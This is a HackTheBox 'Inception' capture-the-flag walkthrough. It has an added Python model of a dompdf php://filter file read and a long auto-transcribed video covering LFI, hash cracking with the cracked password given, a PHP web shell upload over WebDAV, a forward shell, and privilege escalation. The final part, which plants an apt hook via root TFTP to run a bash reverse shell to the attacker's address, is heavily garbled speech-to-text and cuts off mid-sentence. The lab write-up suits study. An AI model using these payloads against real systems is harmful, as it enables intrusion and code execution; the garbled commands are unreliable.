HackTheBox - Inception
Key Takeaways
The video walks through the HackTheBox machine Inception. The box exposes only Apache 2.4.18 on port 80 (Ubuntu) and a Squid proxy on port 3128. The path is: a dompdf 0.6.0 local file inclusion via the php://filter wrapper to read source and configuration, cracking the WebDAV htpasswd hash to upload a PHP web shell, building a file-based forward shell because the box cannot reach back to the attacker, reusing a WordPress config password for the user cobb, escalating to root with sudo, and then discovering the shell is inside an LXC container. The intended route uses Squid to reach SSH on the loopback interface, and the real root.txt lives on the host (the gateway at 192.168.0.1), which is enumerated with a static nmap binary and anonymous FTP.
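The first technique in the video is reading files through the dompdf input_file parameter with the php://filter wrapper, then fishing the base64 back out of the generated PDF. This is an added example that models that read offline; it is not the inception-read.py script from the video. The endpoint path, parameter name and host are the ones named in the transcript, while the PDF text, the /etc/passwd contents and the fake_fetch stand-in for requests.get are constructed here so it runs without the box. It also handles the 500 the server returns for unreadable or missing paths, which the video notes makes file enumeration ambiguous.

```python
"""Offline model of the dompdf 0.6.0 php://filter file read from the video.

Added example (not the video's script).  TARGET and PARAM come from the
transcript; everything under "constructed sample data" is made up here.
"""
import re
from base64 import b64decode, b64encode
from typing import Callable, List, Optional, Tuple
from urllib.parse import urlencode

TARGET = "http://10.10.10.67/dompdf/dompdf.php"   # vulnerable script, from the video
PARAM = "input_file"                               # parameter named in the CVE text


def build_payload(path: str) -> str:
    """php://filter value: PHP reads the file and base64-encodes it instead of
    executing or escaping it, so PHP source survives being rendered into a PDF
    (the video avoids the string.* filters because dompdf backslash-escapes them)."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def build_url(path: str) -> str:
    return TARGET + "?" + urlencode({PARAM: build_payload(path)})


# dompdf writes the page text as PDF text-show operators: "[(base64...)] TJ".
# The video's regex matched "[(" ... ")]"; this one is lazy and spans lines.
_TEXT_OBJECT = re.compile(r"\[\((.*?)\)\]", re.S)


def extract_file(pdf_text: str) -> bytes:
    """Pull the first base64 text object out of the PDF and decode it."""
    match = _TEXT_OBJECT.search(pdf_text)
    if match is None:
        raise ValueError("no text object in PDF; dompdf rendered nothing")
    return b64decode("".join(match.group(1).split()))   # drop line wraps


def read_file(fetch: Callable[[str], Tuple[int, str]], path: str) -> Optional[bytes]:
    """fetch(url) -> (status, body).  None for the 500 the box returns when the
    path is missing or unreadable, so a loop over candidate files keeps going."""
    status, body = fetch(build_url(path))
    if status != 200:
        return None
    return extract_file(body)


def users_with_shells(passwd: bytes) -> List[str]:
    """Usernames whose login shell is not nologin/false (cobb in the video)."""
    out = []
    for line in passwd.decode().splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false")):
            out.append(fields[0])
    return out


# ---- constructed sample data (not captured from the box) -------------------
FAKE_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    b"cobb:x:1000:1000:cobb:/home/cobb:/bin/bash\n"
)


def fake_pdf(content: bytes) -> str:
    """Minimal PDF-like text with the base64 split over two lines, the way a
    real page dump wraps, to exercise the whitespace handling above."""
    b64 = b64encode(content).decode()
    half = len(b64) // 2
    return ("%PDF-1.7\nBT /F1 12 Tf\n[(" + b64[:half] + "\n" + b64[half:]
            + ")] TJ\nET\n%%EOF")


READABLE = {"/etc/passwd": fake_pdf(FAKE_PASSWD)}   # only world-readable file here


def fake_fetch(url: str) -> Tuple[int, str]:
    """Stand-in for requests.get: 200 + PDF for readable files, 500 otherwise."""
    for path, pdf in READABLE.items():
        if urlencode({PARAM: build_payload(path)}) in url:
            return 200, pdf
    return 500, "Internal Server Error"


if __name__ == "__main__":
    data = read_file(fake_fetch, "/etc/passwd")
    print(data.decode())
    print("users with shells:", users_with_shells(data))
    print("/etc/shadow ->", read_file(fake_fetch, "/etc/shadow"))
```

To use it against a live target, pass a fetch that wraps requests.get and returns (response.status_code, response.text); the parsing and payload construction do not change.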
Full Transcript
What's going on YouTube, this is IppSec and we're doing Inception from HackTheBox, which is a pretty darn cool box. It starts off with just port 80 and a Squid proxy being exposed. You're supposed to hack around the website, get remote code execution that allows you to dump some credentials, then you can use the Squid proxy to access programs listening on the loopback addresses of the box, much like the Joker video. You access SSH, use the credentials, gain a local shell to the box. You couldn't do any reverse shells because the box can't actually route to you; you can route to the box if you use that forward shell technique I showed in the Sokar video. You can actually do this whole box without using Squid, but once you get a local shell on the box you escalate up to the root user and find out you're in a guest VM because there is no root.txt. You then have to look at the ARP table, notice that there is a box it's talking to, which is the gateway, exploit that box, the host OS, and that's where the root.txt file is. So it's a pretty fun box, let's just jump in.

First things first, we start off with the nmap scan, so nmap -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call the files initial, then the IP address of Inception which is 10.10.10.67. It does take time so I've already run this, let's just look at the results. We do see two ports open: HTTP is listening on port 80, it is an Ubuntu server and it's version 2.4.18, so if you Google this you could find out the exact distro of Ubuntu running, and we also have an HTTP proxy known as Squid running on 3128. We'll look at this in a little bit, but first things first let's just look at what's on port 80 because normally that is interesting. So 10.10.10.67 and we just see a page. We can try putting something in the email address and click sign up. It has some JavaScript to verify it's an email, so just put something fake in and click. We do get a thank you, so let's send that over into Burp and test one more time, a@b.com, make sure it is intercepting, to see if we can figure out what that JavaScript is doing or what that page is doing. As soon as we click sign up we get a thank you and nothing happened in Burp, so let's press Ctrl+U to open up the source, and right off the bat we see the HTML ends, these numbers keep going, and looking at this slider, way down at the very end we have "to do: test dompdf on PHP 7". So we know we have to look into that.

Let's take a look at the JavaScript file and see if we can figure out what is happening. It says thank you when you sign up, so let's just search for that string, and right off the bat (and I've said "off the bat" a few times so I'll stop that) we do see a note here that says it doesn't do anything other than respond with thank you. So we can stop looking at this page and take a look at what was in that source all the way at the bottom, the dompdf. So let's just put dompdf in the URL because I assume it's gonna be on the server somewhere. We could do dompdf.php or other things, but all dirbusting should focus around dompdf, and before I throw it into dirbuster I just did /dompdf and we see now we do get a page. It doesn't exactly load. We can click on the version and we see it is 0.6.0, click on the README, it responds back, we can open it up in a text editor and see exactly what it is. The requirements are PHP 5, so maybe that's why it says test it on PHP 7. I would probably go to Google and try to figure out when dompdf 0.6.0 got released, maybe it will just search dompdf CVE and see if we find anything for 0.6.0. So before 0.6.1, in 2014, it had an LFI and says "using protocol PHP wrappers in the input_file parameter as demonstrated with this". We can also do a search on dompdf to see if there's anything in Exploit-DB. This one looks like exactly what we just read, we have one in beta, let's ignore the beta 1 because 0.6.0 is the exact version we saw in the README, so not really in the version file. So we do searchsploit -x for examine and then paste in the path to open it up, and this is a bit more detailed than the actual CVE, so it gives us a proof of concept right here.

Let's just test that out, we just have to replace example with 10.10.10.67 and then add the dompdf folder before dompdf/dompdf.php (it's a lot of PDFs), and for the file let's stuff it with /etc/passwd because that's normally, where it has to be I think, world readable. And we do get a PDF document, we can open it up with a PDF reader and we do see a lot of base64 string. So if we copy this and paste it, so we do echo -n | base64 -d, it looks like my copy didn't get the entire string cuz that's pretty small for /etc/passwd, but we do see it's returning stuff, so let's just intercept this into Burp. So go to HTTP history, click on the request, Ctrl+R to send to Repeater, click go and we can see the results, it is a PDF, and scrolling down we see more base64 than we copied, so we can just copy this, do echo -n | base64 -d and we can see we do get the passwd file, and there is also the user cobb on the machine. So we have to probably create something to make this a bit easier because doing this every time is a pain, but before we do that let's see if we can get any command execution. So if we can probably trick this to read data we could insert PHP and try to get code execution, so let's try a few other files. We know the server is running Apache so let's try /var/log/apache2/access.log. We don't get anything, we get an internal server error, so let's just put an invalid file and see if we still get this 500. So we do, so we know maybe if we can't read the file because of permissions or the file doesn't exist it says 500, so that doesn't really help us that much. If we just put a folder we get error 500, so we can't even enumerate folders. So the next thing I do is enumerate the Apache configuration, so apache2. We can look on our machine because Kali's based upon Debian and Ubuntu is based upon Debian, the Apache configuration's probably going to be the same. So we do /etc/apache2, we can look at apache2.conf and see where the log files are being written to, and there's a good chance this isn't readable by our user but it's still something good to check. If we didn't want to do base64 every time we can probably just change this convert.base64 to string and then just read it here, but man is that ugly, so I'm gonna undo that and I'm gonna write a script to just automate this, because looking at files individually is a huge pain.

Actually I lied, one last thing to check: let's Google PHP wrappers and see if we can get code execution, Google that with code execution, see if we find something. This one may be good, and we can look a little about wrappers, what they are. We just Google PHP wrappers, go to this manual, you can see different things you can do like access files, URLs, PHP, compressed files which are good if you have file uploads, SSH, that's an odd one, expect. Going to this blog we can try to see a few things. I hate skimming in videos so we're just going to do it. One of the wrappers is the expect, so if expect is enabled on the server we will just do expect://id and we can't, so that one's disabled. Then we could try data:text/plain,something, so we'll do tests and that gives an error. So these are the two common methods of testing. We can test a bunch of other files, so we could try doing, what was that, php read /proc/self/environ and this may tell us what environment variables that we may be able to control, or at least the user HTTP is running as, but we can't access that either. So now we can actually begin writing the script to automate exporting files.

So let's open up vi and create the file inception-read.py. We know we're going to need the requests module, also we're going to need base64 decode, so we're going to do from base64 import b64decode, and the reason why I'm avoiding the string wrapper, if we went back to that, let's see, apache2, apache2.conf (I think no one should remember that location, apache2.conf), if we look at this and just did it base64 encode, so read=string, we can see it's probably gonna be doing a lot of escaping that doesn't naturally exist, like everything with the parentheses has a backslash before it, so that's why I just want base64, so I don't have to deal with it actually modifying the output. And then what's another thing we need, import re for regular expressions because we're gonna have to grab the output of the page and grab only the base64 piece. So let me create a function called get_file and I'm gonna pass it the parameter file, and we have to create a payload that we send to the server that is the actual argument, so if we just copy up to resource it'd be a lot easier, so input_file: this plus file. Then we want to actually send the request, so we can create a new variable called response and do requests.get, the IP of Inception which is 10.10.10.67, then the path to the vulnerable program which is dompdf/dompdf.php, then we can specify the parameters we want to send, a payload string. Now we want to grab the text of that request and then we want to strip any space at the end, empty lines, let's see, that's good, I close that parenthesis so that is good. Now we need to create, or just grab, the base64, so we do b64 = re (for regular expression, that's the module we had imported) .search and we have to find something in the response. So let's go over and look at this, we can see the string begins with a bracket then a parenthesis, and those are special characters so I'm going to put backslashes before them to escape, and then we want to grab everything, so we need to put another parenthesis because this tells the regular expression what to match, we'll do .*? and that will copy everything but I think newlines because we hadn't specified that, and then it ends with a parenthesis and bracket so that's that as well, and we want to grab the very first match so we'll do group(1) and then we can return the base64 decoded output of b64. So that should be that function and we can just call this function real quick to test it out, so get_file /etc/passwd. So if we execute that we get no results because I did not print it, there we go. It looks a little bit ugly, it encoded this all as bytes, so let us try to decode this, so we can do print(get_file(...)), maybe we can just do .decode, does it have that function, it does. So decoding it decoded the binary format to a string, and the reason why I said binary is because it had b then the single quote, I hope that means binary. We also see the \n's where line breaks are supposed to be. This still isn't really that efficient though for grabbing a bunch of files and doing good enumeration, so we can do an infinite loop and say cmd = input(), then we can try this function, and the reason why we're doing a try is because if we get an actual error we don't want the program to crash, we just want it to tell us "hey you made a mistake". So output = get_file(cmd), then we can print output.decode(), then add the exception handler, except, and then just print error. So if all goes well we should have a nice little program. So we input /etc/passwd and we get passwd, we could do, let's see, hosts, we get that file.

So let's poke around this box and see what there is. So let's do /proc/self/environ, nothing; /proc/self/fd/0, can't access that, and this is just trying to enumerate information about this process, so we can't get into /proc/self, let's move on. What would be another good thing to look at, /etc/shadow, if we are root we'd be able to read that, we can't, so we're probably the HTTP user, normally Apache's not running as anything else. So let's look at the Apache config again because it was ugly and I had a typo there, /etc/apache2/apache2.conf, and that is much prettier. So where is the log file stored, is it /var/log/apache2? Let's just search for log, so /log, nothing there, hostname, ok, log, there, error log, so APACHE_LOG_DIR/error, so do we know what that is, I don't know where APACHE_LOG_DIR is stored, but let's look at the actual site config. So if we go back to the Ubuntu machine and go into, let's see, apache2, we see there are mods-available, sites-available and sites-enabled, so sites-enabled will probably be the best one to look at, so 000-default.conf. So if we do, let's see, apache2/sites-enabled/000-default.conf we do get some results. So we got VirtualHost *:80, it's serving out of the /var/www/html directory, and we also see there is a webdav_test_inception directory and it's requiring credentials and the credentials are in this file. So let's grab that file and we see they are hashed and the user is webdav_tester. So now we have two users on this box, webdav_tester and cobb, so we may want to start creating some good notes. So we do users, we got cobb, webdav_tester, don't really have any passwords yet but we should be able to crack one.

So copy that, go into the Cracker, and this is just one of my computers I use to crack passwords with. I could do the VM but VMs generally don't like password cracking, especially when I'm doing video recording, so that's why I'm using a different box. So we do vi, I have a folder for hashes and this will be inception.hashes, paste this, and I'm not sure exactly what that format is. We could do hashcat -h and probably guess from looking at this, however I don't like using that, I like just Googling hashcat example hashes, and the reason why I like this page more than the actual help of hashcat is it gives us examples. So it started off with $apr1$ and right off the bat we see that is the Apache format, example hash, this looks like exactly what we have, it is 1600. So let's do hashcat -m 1600, specify the hash, so hashes/inception, and then a wordlist, and since this is CTF I'm just gonna specify rockyou.txt first. We don't have to do anything fancy, if it's meant to be cracked it's normally in the rockyou thing, and you don't need a bunch of graphics cards to crack this, it's a relatively quick thing. Again, I just hate running hashcat on my VM when I'm running other things on this machine like recording. Turn off, and we get the password cracked right away, babygurl69. So let's go back into our notes and create a pw thing and just paste that password. I'd normally use CherryTree or something when I'm actually taking notes, but for this just creating text files is fine, and the reason why I like CherryTree is you also have hotkeys to take screenshots and that just makes life easy. I don't have exit on that, so we can stop that and look at what is in that WebDAV directory.

So let's see, it is 10.10.10.67, it was webdav_test_inception, we got a username, it was webdav_tester, the password was babygurl69, with a u, 69, get a forbidden message. So let's test if we have upload privileges to WebDAV. I believe this was back on Granny, which was a Windows XP box that we did this with, maybe it was Grandpa, it was one of those videos, but we can do curl... Oh, actually before we upload a shell let's copy it here, so our shell php, cmd.php, and we don't need these characters at the beginning, I forget what video we put those in but that is just stuff to make it look like an image. I do file cmd.php, oh no it's not, maybe they got clobbered, that's normally what I do, but I guess then we went the wrong way about that there, so just clean that up. Do you want to see the file? It's very simple, just echoing the results of a system command and getting the parameter, yep. So let's upload this file, so curl --upload-file, then we can specify the file name which is cmd.php, then we gotta say where to upload it to, so http://10.10.10.67/webdav_test_inception, and WebDAV is like a web file browsing protocol that allows uploads and stuff, so that's why I'm testing this. We can specify the user with --user webdav_tester:babygurl69 and I probably should specify the filename and the destination, I don't know if I have to or not. Don't get anything back, that is odd, so I'm going to curl -vvv and "we are completely uploaded and fine", so it looks like it did upload the file. So if we go to cmd.php we don't get a forbidden; if we went to something that didn't exist on the server we'd get not found. So we can say ?cmd=ls and we get a shell.

So if we wanted to we could take a shell from one of the previous videos like Sokar, which was a VulnHub machine I did not too long ago, and I'm gonna take that shell because it's like 70 plus lines of code, I don't feel like retyping, so I'll explain the shell quickly, and if you want to watch me code it you can actually just watch the Sokar video. So move that to inception-run.py, I guess I should name that shell but oh well. There we go. So we have a few modules, we have requests, time so we can do sleep, base64, random (you'll see when we use that) and threading so we can run something in the background. So we got this thread that's just running a loop constantly. Then Sokar was a shellshock video so we have shellshock here and we're writing the command we want to execute into a file to run. It'd actually be easier if I just show this one small part, so the theory behind this thing is to get a TTY over HTTP requests. And I guess I could show you, I kind of jumped ahead, that we can't do any reverse shells because there's a firewall, so I forgot that enumeration step, so I guess we can, yeah I don't really have time to show that, so apologies, but if you did a bunch of reverse shells you'd find out they don't work, so that's why I jumped over to this. So we can grab a copy, so I'm just gonna do this to copy it. So you'll notice this looks very similar to the reverse shell we normally do with netcat, except instead we're doing it with files, and we have to create two files, so we'll do /tmp/input and /tmp/output. So we're creating a named pipe at /tmp/input and then we're going to be reading that named pipe and then sending everything over to bash and then having bash send it over to output, and what this allows us to do is kind of establish a persistent shell, because if we just send commands one at a time we don't keep it, so if we do like cd .. and then did another command it re-ran the shell from the beginning and we don't keep that session, so this enables us to keep that. So if you run that command we see it hangs, but if we echo whoami into /tmp/input and then read /tmp/output we get the results of that command. We can also do that with like ifconfig to show it, so that's exactly what this script is doing, and the reason why we have a thread is because the request finishes immediately and we want to read the output file like every second so we can get the results.

We have to fix this to not be shellshock, we'll just use the PHP script that we uploaded, so get rid of... actually we'll just name this payload and we want to have the payload be cmd, because that's the param that we send to execute code. Get rid of shellshock and echo our command | base64 -d | sh, and I think that's maybe all we're doing, yeah I think that's it. So edit the actual request to be requests.post, I have to fix that IP, we'll fix that later with a sed because we'd have to make that change multiple times. We can fix headers with sed, fix everything with sed, so %s first, search and replace with sed, and then 172.16.10.138, then we'll escape cgi-bin and escape that slash, forcat, and then we'll replace it with 10.10.10.67, escape the slash, what is it, webdav_test_inception, is that the folder, yep, escape that slash, cmd.php, do a global search and replace, it should replace it in two places, and we typed that correct. So now the next thing we have to do is replace the headers, so headers=headers, I'm gonna say that is now params=payload, and params is the parameters for a POST request and payload is this variable that we just created, okay. And we also have to add our authentication because if we're unauthenticated we can't hit that file, so auth= webdav_tester, I believe that was the user, and then the password is babygurl69, and we actually have to put that in quotes and that should be good. Go down here, just hit period to redo everything we did with that session, and that did not work, so we'll just retype it, webdav_tester, babygurl69, and I need auth, okay. Clean this one up because we don't need shellshock, we need okay, and this is payload. If this is all complicated, we actually don't have to do all of this, there is another route to go, but this is the route I had done on the box when I was doing it, so I'm showing you that first and then I'll show you the other way to go about it. So that all looks good, if we do a python3 on this we'll hope we got everything correct, and we did not, we forgot a comma, so after this auth we need a comma, and if I did the same mistake here, okay, and we probably, I guess, want a space here, guessing no, oh, "all equals", there we go. So it's creating a shell and then if all goes well we can do ls and see files.

So if we go up a directory, do an ls, we see an actual WordPress directory that we didn't see before, so we can look in this, do another ls and we got wp-config.php, look in the database and we can grab the credentials for WordPress, we got root and then this password. So we can try to su to see if the MySQL has the same password, we didn't get any response back, so this is where this shell comes in really cool, as we can just do python -c 'import pty; pty.spawn("/bin/bash")', and because it's the persistent session and not just erasing every time... I think I may have a typo, there should show something back, and echo password, that's not, so we do which python, python2 is not installed, do we have python3, we do, so we can do python3 -c 'import pty; pty.spawn(...)' and that's what I'm expecting to see, it looks like we have loaded bash and we should be able to now do su -, it's asking us for the password, we can paste the password, do a whoami, authentication failure. So we know there's also the cobb user, so let's try that, and cobb had reused that MySQL password. The other thing we could have done is like mysql -u root -P (capital), and mysql was not found; netstat -alnp | grep for 3306, which is the MySQL port; netstat -anp | grep for LISTEN, and we have MySQL isn't even installed on this box. So that is why I didn't go digging into the MySQL database when I saw that password and immediately started trying it with user passwords, because why would a person put in the password in that configuration file and try to set up WordPress when there's no database? We could also go back up and see the host is on localhost, so that was the clue that made me try different users with that. So we can do a sudo -l to see if cobb can do anything, paste the password in, do a whoami, well look at the output of sudo and we can see he may run every command on it, so sudo su and we're root. So if we just went to the root directory we should be able to cat root.txt and get the flag. Unfortunately the flag is not there, it just says "you're waiting on a train, a train will take you far away, wake up to find root.txt", so it's not there.

And before we continue, we could keep doing it in the shell but I'm going to show you the intended way to get up to this root path and that is through SSH. If you did the enum you see it is listening on SSH but we didn't see that before, it is on Squid, so if we actually went back and enumerated Squid we would have known to use Squid to proxy back to the box, kind of like a server-side request forgery, and we could access the SSH port and just SSH in once we found this password. So let's go here, vi pw, put the password we found, and look in the Squid. So let's go to Firefox, we can do options on FoxyProxy and we can edit, we'll just add a new proxy and say 10.10.10.67 on port 3128 and then click okay, is there something on general where I can give it a name, we'll name this Inception, close that, right click here, let's load Inception and then go to 10.10.10.67, access is denied, but we're not getting a user prompt, so I'm gonna try 127.0.0.1 and we get on the page. So it went to Squid and told Squid "hey go to localhost" and pulls up the page, and another video that has Squid is Joker if you want to take a look at that, but since there's no credential in this it makes it really easy. We can just edit proxychains.conf, and proxychains is a program that makes non-proxy-aware things proxy aware, so let's just add a thing to say http, because that's the type of proxy Squid is, the location which is 10.10.10.67 and the port 3128, and then now we can send any command through the proxy. So if we want to do proxychains nmap, we have to specify full TCP scans, by default it does a SYN scan which only sends that first SYN packet and watches for the response of the server, if it's a SYN-ACK it says the port's open, we can't do that through a proxy, so we have to do the full TCP scan, and then the IP address which is 10.10.10.67, and we know port 22 is open, so to make it go fast, -p 22, do -n for no DNS, and 10.10.10.67. It's saying it's closed, let's tell it to go to 127.0.0.1 because it's not listening on the global interface, it's listening on 127.0.0.1, and we see SSH is open. Let's look at my local box, nmap -p22 127.0.0.1 just to make sure we didn't just nmap ourselves, and we see my local box has SSH closed, so we know we should be able to SSH right in. So leave that proxychains command there, do ssh cobb@127.0.0.1, put the password in, I guess I copied something, so cat pw, grab the password, put it in SSH, and we can do the sudo su, escalate to root, and now we have a real shell and we don't have to use that crappy Python thing we have been using.

So the next step is to find that root.txt file, so let's run LinEnum to see if that helps us at all, but to do that we have to put it on the box, so we're gonna cat LinEnum.sh, and you should be able to just Google this and find it, if you just Google LinEnum.sh github; xclip -selection primary, that should put it in my clipboard, paste, try the other clipboard, there we go. And before I do that we can look at ifconfig to figure out why we didn't get the reverse shell. We see 192.168.0.10, this box's IP is 10.10.10.67, so we are either in a VM or there's some NAT, there's something weird going on, because I don't see the IP we're accessing this box with. So let's run LinEnum and see if that helps us figure out what's going on, can take a little bit to run. I forgot to revert this box, there's a lot of weird stuff in a folder. Let's go to the results while we're waiting, okay we're at the top, so get the standard Ubuntu information, Ubuntu 16.04, the hostname, users that logged in, of course cobb's logged in, that is us, group memberships, we got root and cobb, we can read the shadow file because we're running this as root, there's the sudoers, root's home directory, a lot of weird stuff in it, permissions on home, lax of course, files owned, of course we're not looking at anything to do with reading or writing files because well we're root, of course we can, SSH keys, shells, cron jobs contents, network, we got something in the ARP history, 192.168.0.1, that is the gateway of this box, listening TCP and UDP, not too interesting, processes and binaries, sudo version, actually I don't think it's doing what I wanted it to do, and is the output of the mount command, that's where I've been scrolling to look at, and don't see it. So if we just ran mount to look at what's mounted we see a bunch of LXC stuff. Now LXC is Linux containers, and if you went to the Calamity video I kind of explained that a little bit because we used an LXC for privesc on Calamity instead of doing that giant buffer overflow, but the odd thing is it's an LXC thing and we only have one interface and that's not the interface we wanted, so we can guess that we are in the guest OS and 192.168.0.1 is probably the host OS.

So if we do which nmap we don't have nmap on this box, we can probably ping 192.168.0.1, and if we want to nmap that we could go back to our box and say proxychains nmap -sT on 192.168.0.1 and then do -oA output all formats in the nmap directory and say gateway we'll call the file, and that's going to take a while to run, probably before we do that we have to do -Pn to not ping through the proxychains and then -n because we don't care about DNS, and then we see it trying a bunch of ports. If we wanted to do this a little bit faster we could just install nmap on this box. I forget what video I did it, if you probably YouTube "ippsec alien" it'll pull up that video, maybe it was Tenten's video, I don't know, but there was a video where we installed nmap and we actually grabbed I think the rpm and converted it to a deb, we grabbed the deb and converted it to an rpm. But if you wanted to you could just statically compile nmap, we'll pull a statically compiled nmap from the internet. Static compile means it just adds all the dependencies in the binary, which makes it bigger but it also makes it so, well, you don't have to install the prerequisites everywhere. So if we just Google "static compile nmap" (make sure we're not going through the proxy) we get a guide on how to do it, but then we also get a GitHub page with a bunch of static binaries, so we just go to the GitHub page and right off the bat we have an nmap on 64-bit. If we go to SSH, uname -a, we see we are 64-bit. If you want to look at other binaries there's just loads and loads of them, but nmap is what we want. View the raw, I mean just copy link location, do wget on that file, let's resolve it, here's the thing, wait, that is on Inception, we have to do it back on our box, not the Inception box. So wget the file and we can move nmap, rename it to be static-nmap, I didn't want to just do nmap because I got a folder nmap, so I had to name it something else, and then to upload the binary we could either base64 encode it, but that's a few megabytes and that would take a while, so the best route is to just do an upload file command the same exact way we uploaded the PHP shell. So we can do curl --upload-file static-nmap, specify the user and we'll specify location, add -vvv so we can see the headers, and it hasn't finished yet, "we are completely uploaded the file", we got 201 Created. So if we go back to SSH, go to /var/www/html/webdav_test_inception, we do have a static-nmap created, so let's just copy that into /dev/shm, and we can see my script creating random things here, so we can do chmod +x static-nmap. Now if we execute this we have nmap, looking at the results it said everything is closed, that is odd, something should have come out, maybe that proxy can't hit 192.168.0.1, I'm not exactly sure what went there, what happened. Let's see, IP right, -A, and don't do DNS, 0.1, is that what I have, 0.1, I really hate that, yeah I'm not sure why that's happening, normally you can use proxychains and nmap through it, I guess not in this case. If you want to do nmap through a proxy, SOCKS proxies work much better than HTTP I found, but let's go back to just getting nmap on this box.

So if we go to this page, one, it says something here, whoops, back, start line, errors, notes, it wants us to set that NMAPDIR, so we can tell it where the actual nmap scripts are. So if we want to do scripts on nmap we should copy scripts to the server and put them in this nmap dir, so let's do that, because scripts are a nice thing to have with nmap. So we can do locate nse$, I think we'd specify -r for regular expression, and where are they, /usr/share/nmap/scripts, this is what we want. So let's create a tar, -cvf, do capital, it's a capital X I think, it's capital J for xz, capital X would make sense but I think it's capital J, nmap-scripts.tar.xz, specify the directory we want. Oh, we tarred inside of that, we know the full path, we just want it right here, I'm actually going to copy a tar in a tar, which is going to be ugly but oh well. So let's remove that file we had created, so we have .tar.xz, if we do upload file we can now upload this to the server, so nmap-scripts.tar.xz created, go back to Inception, in a folder we can extract it, tar -xJvf nmap-scripts, let's see, extract, capital J, -v, nmap-scripts/, tab, let's try this, what if it just doesn't have xz on the server, -xJvf, my box extracts it, so instead of compressing it let's just not compress it, and then we can upload that file, created, move this temp to, tar -xvf nmap-scripts, I have J as a habit, okay, and we have it copied, and copied to /usr/share, so we can create, let's go back and we can move /usr/share/nmap into /usr/share, and if we go execute nmap, which I think I put in /dev/shm, you should be able to do -sC -sV, actually before we do that read this and set this variable. So we can echo NMAPDIR, we see we don't have that environment variable set, so export NMAPDIR=/usr/share/nmap/scripts, that's what it is, and I think it just wants /usr/share/nmap, I probably should have copied and used /usr/share/nmap instead of specifying the script directory, we'll see what happens, what's the worst that can happen. So nmap -sC -sV and then the IP address of the gateway, 192.168.0.1, we have to do ./static-nmap, failed to initialize script engine. So let's copy /usr/share/nmap, -cvf, I don't know if that actually is gonna fix anything, and this is why I should always do more testing before I record a video, because you always run into small things you don't expect. You're just gonna slash, we can tar -xvf /var/www/html/webdav_test_inception/ and untar that, okay, let's rerun that command and hope for the best, nmap -sC -sV 192.168.0.1, we don't have nmap in the path so we can do that, still errored, oh, these NSE scripts require a newer version of nmap, so we'd have to statically compile a new version of nmap to make these scripts work. So we're just going to ignore scripts and just do ./static-nmap on 192.168.0.1, it would help to actually read the error message before we go out and troubleshoot. It shouldn't take too long, and it's done, we got three ports open, SSH, DNS and FTP.

So the first thing we do with FTP is just try anonymous login and we got the banner, 3.0.3, so since we saw a version we can searchsploit vsftpd and we don't have anything for 3.0.3. Specify the user anonymous and it loads us in, so there are a few files we want to look at, let's go to cd /proc/self and get environ, that doesn't open, let's go to net and we can get tcp, zero bytes, get udp, zero bytes, if we actually had files there, I'll switch to ascii and try to get it, it had bytes, this would be which ports are open on the box so we wouldn't have to do a full nmap scan or things like that. So let's see what else can we get, let's go to /etc, get passwd, got that, let's see what else can we get, let's get init.d, see what services are running on the box, we got apparmor, checkfs, cron, hwclock, there's lxd, there we got a TFTP service, that is interesting, so let's get that, what was it, tftpd-hpa, transfer complete, cat that file, see at the beginning it says the default for the configuration's probably in /etc/default/tftpd-hpa, so let's do FTP again, say I wanted this as tmux, get out of FTP, tmux, we do, so I have my tmux right now bound to Ctrl+B as the modifier, so every time I want to do a split pane I just hit Ctrl+B twice and now we can have multiple windows into Inception, Ctrl+B twice and then, like oh, there we go, that's why I sometimes bind the modifier of my host OS to Ctrl+A so I don't have to do that, because sometimes hitting Ctrl+B twice just doesn't work, but now that we have two windows into Inception we didn't have to do that SSH twice which we probably could of
but oh well when I do one six eight zero one not amiss and let's see let's see default and we wanted tftpd - HPA and we can cap that file and we see it's running as root for at 69 and we can create files so let's try that so we can do tftpd one i - one six eight zero one not the TFTP CD temp can we CD no I guess we can only put and stuff so put we do that let's create a test file exit touch hip sack TFTP again we can put hips ik in slash temp and we spent have to specify the path so put hip sack and slash tab hip SEC we go to temp and FTP we see if SEC is created and it's UID is zero so we have actually created file as the root user so we know TFTP is actually running as root so the next thing we're gonna do is try to get root ssh ID underscore RSA fo not found get root not SH found must have global reaper get root dot junk file not found so unlike the file read when we're doing it over HTTP we can now enumerate what are valid folders and not because we have found out found versus global reaper missions so this error message a bit more verbose which gives us more information what are other good files to get we can get etsy shadow must have global repercussions get a spool Krong tabs root file not found so we can probably create eight crontab for root so let's try that so if we go back up here we can exit STP we can create a file called root and say every single minute touch tab pound and now we can put root and verse four contacts root root oh no contacts root is all we want well I'm not found oh no Israel twice no it's not I screwed up put route vers bull route now krong krong tabs route I think I'm screwing that up the whole time yeah so we can get that file spoole cron gone tabs route nope can't get that file either so even though we're the root user we're having a lot of trouble pulling configurations we want make that completely big let's see what else can we do get Etsy crontab if we look at Etsy crontab we do have a cron running every five minutes it's an 
apt upgrade very log apt custom dot log so if we create a pre invoke script for app we can actually get command execution so there is something to do a like configs before and after you run app and we can actually configure that and we do so by creating a file and Etsy app tap comp so let's go back up here where we can create files we're going to create zero zero shell it can be called anything I think water of execution is based upon file name so zero zero execute first year one execute second etc but the actual thing we do is app update pre and VOC and then then bash tab you do EPS at Sh so if we upload this file to the server and before we do that we can go back to FTP anonymous CD town we never created pwned so that contact never ran and I think it's because the file is Ward readable and for the krons I think it has to be a bit more secure than that but I digress we have to create that if SEC file so V if sec it'll be been bash and it'll be faster - I have TCP if config 1010 1430 1010 actually I don't know if the Box can route to us so this is where having team bucks and so on the server is nice because we don't have to open up 100 sessions to the box 192 168 0 10 and we'll say port 8000 see if that command works and if that doesn't oh I guess we can do paying - c11 I do 1 6 8 0 10 and that will tell us it ran most likely that box can ping us and mate this bash command may not actually work but ping definitely will if it executes 0 10 there we go so now we got to upload these files so if we cat let's just clear that cat 0 0 shell and we can do put zo zo shell and let's see at app Kampf D / 2 0 0 so I just put it there and we also got to upload it sector Sh so if sector SH and Tam EPS SH okay and Cl vnp 8,000 I'll thank God and see his own I was about to cry was like I never tested if and C's on this box so every minute this should run and it should also TCP dump - I eat zero ICMP and we don't have TCP dump that's splendid so that ping isn't actually going to 
